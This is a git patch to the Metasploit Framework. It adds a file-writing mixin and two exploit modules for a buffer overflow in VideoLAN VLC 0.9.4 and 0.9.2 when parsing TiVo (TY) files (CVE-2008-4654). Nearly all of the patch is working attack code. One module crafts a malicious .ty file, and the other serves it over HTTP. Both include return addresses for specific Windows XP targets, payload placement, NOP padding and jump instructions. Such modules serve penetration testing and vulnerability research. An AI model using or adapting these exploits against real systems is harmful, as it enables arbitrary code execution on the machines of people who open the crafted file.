From e1e1f5d6a413c16a6569b26ce6ec220960ac7d86 Mon Sep 17 00:00:00 2001
From: Mario Ceballos <mc@metasploit.com>
Date: Wed, 3 Dec 2008 01:23:27 +0000
Subject: [PATCH] added fileformat mixin, fileformat exploit videolan_tivo.rb,
 and network based exploit videolan_tivo.rb

git-svn-id: file:///home/svn/framework3/trunk@5993 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/exploit.rb                       |  3 +
 lib/msf/core/exploit/fileformat.rb            | 31 +++++++
 .../windows/fileformat/videolan_tivo.rb       | 87 ++++++++++++++++++
 .../exploits/windows/misc/videolan_tivo.rb    | 91 +++++++++++++++++++
 4 files changed, 212 insertions(+)
 create mode 100644 lib/msf/core/exploit/fileformat.rb
 create mode 100644 modules/exploits/windows/fileformat/videolan_tivo.rb
 create mode 100644 modules/exploits/windows/misc/videolan_tivo.rb

diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
index 10eea3a147..a63c0d2c08 100644
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -242,6 +242,9 @@ class Exploit < Msf::Module
 	# Networks
 	require 'msf/core/exploit/lorcon'
 	require 'msf/core/exploit/capture'
+
+	# FileFormat
+	require 'msf/core/exploit/fileformat'
 	
 	#
 	# Returns an array of all of the exploit mixins.  Lame algorithm right now.
diff --git a/lib/msf/core/exploit/fileformat.rb b/lib/msf/core/exploit/fileformat.rb
new file mode 100644
index 0000000000..dda43b2560
--- /dev/null
+++ b/lib/msf/core/exploit/fileformat.rb
@@ -0,0 +1,31 @@
+###
+#
+# This module exposes a simple method to create a file.
+#
+###
+
+module Msf
+
+module Exploit::FILEFORMAT 
+	
+	def initialize(info = {})
+		super
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ false, 'The file name.',  'MSF']),
+				OptString.new('OUTPUTPATH', [ false, 'The location of the file.',  './data/exploits/']),
+			], Msf::Exploit::FILEFORMAT
+		)
+
+		def file_create(data)
+				fd = File.new("#{datastore['OUTPUTPATH']}/#{datastore['FILENAME']}","wb")
+					fd.puts data
+				fd.close
+				print_status("File '#{datastore['FILENAME']}' is located in '#{datastore['OUTPUTPATH']}' ...")
+		end
+		
+	end
+
+end
+end
diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb
new file mode 100644
index 0000000000..2d3dc51548
--- /dev/null
+++ b/modules/exploits/windows/fileformat/videolan_tivo.rb
@@ -0,0 +1,87 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::FILEFORMAT
+        
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'VideoLAN VLC TiVo Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a buffer overflow in VideoLAN VLC 0.9.4.
+					By creating a malicious TY file, a remote attacker could overflow a
+					buffer and execute arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => 'MC',
+			'Version'        => '$Revision:$',
+			'References'     =>
+				[
+					[ 'CVE', '2008-4654' ],
+					[ 'BID', '31813' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},					
+			'Payload'        =>
+				{
+					'Space'    => 550,
+					'BadChars' => "\x00",
+					'StackAdjustment' => -3500,
+				},
+			'Platform' => 'win',
+			'Targets'        => 
+				[
+					[ 'VideoLAN VLC 0.9.4 (XP SP3 English)', { 'Ret' => 0x6a575cad } ],
+					[ 'VideoLAN VLC 0.9.2 (XP SP3 English)', { 'Ret' => 0x65473351 } ],  
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Oct 22 2008',
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptString.new('FILENAME', [ false, 'The file name.',  'msf.ty']),
+					OptString.new('OUTPUTPATH', [ false, 'The location of the file.',  './data/exploits/']),
+				], self.class)
+
+	end
+
+	def exploit
+
+		ty =  "\xF5\x46\x7A\xBD"      
+		ty << "\x00\x00\x00\x02"
+		ty << "\x00\x02\x00\x00"        
+		ty << "\x00" * 8
+		ty << "\x00\x00\x05\x41"     
+		ty << "\x00" * 4          
+		ty << "\x00\x00\x05\x49"     
+		ty << "\x00" * 60   
+		ty << [target.ret].pack('V') + payload.encoded + make_nops(12)
+		ty << "\x00" * (130980 - 4 - payload.encoded.length - 12)                  
+		ty << "\x05"                
+		ty << "\x00" * 3                
+		ty << "\x05"                 
+		ty << "\x00" * 1                
+		ty << "\x09"                 
+		ty << "\xc0"                
+		ty << "\x00" * 14
+		ty << "\x06"                
+		ty << "\xe0"                 
+		ty << "\x00" * 302004
+
+		print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+		file_create(ty)
+
+	end
+
+end
diff --git a/modules/exploits/windows/misc/videolan_tivo.rb b/modules/exploits/windows/misc/videolan_tivo.rb
new file mode 100644
index 0000000000..de0492e309
--- /dev/null
+++ b/modules/exploits/windows/misc/videolan_tivo.rb
@@ -0,0 +1,91 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'VideoLAN VLC TiVo Buffer Overflow',
+			'Description'    => %q{
+                                        This module exploits a buffer overflow in VideoLAN VLC 0.9.4.
+                                        By creating a malicious TY file, a remote attacker could overflow a
+                                        buffer and execute arbitrary code.
+			},
+			'License'        => 'MSF_LICENSE',
+			'Author'         => [ 'MC' ],
+			'Version'        => '$Revision: $',
+			'References'     => 
+				[
+					[ 'CVE', '2008-4654' ],
+					[ 'BID', '31813' ],
+				],
+			'Payload'        =>
+				{
+					'Space'           => 550,
+					'BadChars'	  => "\x00",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'VideoLAN VLC 0.9.4', { 'Ret' => 0x6a5e6710 } ],
+					[ 'VideoLAN VLC 0.9.2', { 'Ret' => 0x6a5e69d7 } ],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Oct 22 2008',
+			'DefaultTarget'  => 0))
+
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		
+		return if ((p = regenerate_payload(cli)) == nil)
+
+                ty =  "\xF5\x46\x7A\xBD"
+                ty << "\x00\x00\x00\x02"
+                ty << "\x00\x02\x00\x00"
+                ty << "\x00\x00\x00\x00"
+		ty << "\x00\x00\x00\x00"
+                ty << "\x00\x00\x05\x41"
+                ty << "\x00\x00\x00\x00"
+                ty << "\x00\x00\x05\x49"
+                ty << "\x00" * 60
+		ty << "\x00" * (1024 - payload.encoded.length) + payload.encoded
+		ty << make_nops(2) + Rex::Arch::X86.jmp_short(6) + [target.ret].pack('V')
+		ty << make_nops(12) + [0xe8, -525].pack('CV') + "\x00" * (129931)
+                ty << "\x05"
+                ty << "\x00\x00\x00"
+                ty << "\x05"
+                ty << "\x00"
+                ty << "\x09"
+                ty << "\xc0"
+                ty << "\x00" * 14
+                ty << "\x06"
+                ty << "\xe0"
+                ty << "\x00" * 302004
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		send_response_html(cli, ty, { 'Content-Type' => 'application/octet-stream' })
+	
+		handler(cli)
+
+	end
+
+end